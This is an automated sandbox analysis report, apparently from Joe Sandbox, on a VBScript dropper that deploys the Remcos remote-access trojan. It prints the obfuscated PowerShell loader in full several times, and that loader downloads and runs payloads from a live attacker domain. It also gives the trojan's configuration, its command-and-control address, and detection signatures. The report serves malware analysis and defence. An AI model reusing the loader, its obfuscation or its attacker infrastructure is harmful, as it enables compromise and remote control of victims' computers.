2024-12-12T07:56:03.524506+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49894 | 154.216.18.216 | 2404 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T07:54:52.755878+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49776 | 172.67.216.143 | 443 | TCP

              AV Detection

Source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.216:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7K8JAD", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Yara match | File source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7768, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.2% probability
Source: unknown | HTTPS traffic detected: 172.67.216.143:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.216.143:443 -> 192.168.2.7:49776 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1599797657.0000000007B6C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1246016018.00000232AF2D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244087582.00000232AF0D1000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49786 -> 154.216.18.216:2404
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49894 -> 154.216.18.216:2404
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49841 -> 154.216.18.216:2404
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49946 -> 154.216.18.216:2404
Source: Malware configuration extractor | IPs: 154.216.18.216
Source: global traffic | TCP traffic: 192.168.2.7:49786 -> 154.216.18.216:2404
Source: Joe Sandbox View | ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo | SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49776 -> 172.67.216.143:443
Source: global traffic | HTTP traffic detected: GET /rxHEjEYE/Nickelization.csv HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: of1x.icu | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: of1x.icu | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.216
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /rxHEjEYE/Nickelization.csv HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: of1x.icu | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: of1x.icu | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: of1x.icu
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1716544458.0000000006A01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsk
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1716544458.0000000006A01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.H
              Source: powershell.exe, 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1365512163.0000029101C8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://of1x.icu
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1365512163.0000029100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1572573596.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1365512163.0000029100001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1365512163.000002910133D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1365512163.0000029101BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1365512163.0000029100226000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu
              Source: msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/
              Source: msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2547290255.0000000006B40000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin#;
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin(;
              Source: msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.binI
              Source: powershell.exe, 00000002.00000002.1365512163.0000029100226000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/rxHEjEYE/Nickelization.csvP
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/rxHEjEYE/Nickelization.csvXR
              Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknown | HTTPS traffic detected: 172.67.216.143:443 -> 192.168.2.7:49699 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.216.143:443 -> 192.168.2.7:49776 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match | File source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7768, type: MEMORYSTR

              System Summary

              Source: amsi32_7452.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2356, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file | Call Stjkortlgningen.ShellExecute( "p" + Halvabernes,Psocidae & Woolly & Psocidae,"","",0)
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,u
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC48B8D2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC48AB26
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC55A4DA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC559CCA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC5587A5
              Source: Strait STS.vbs | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6259
              Source: unknown | Process created: Commandline size = 6259
              Source: amsi32_7452.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2356, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@8/7@1/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\huguenotism.Bed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-7K8JAD
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lymuuapl.w43.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2356
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7452
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,u
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,u
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
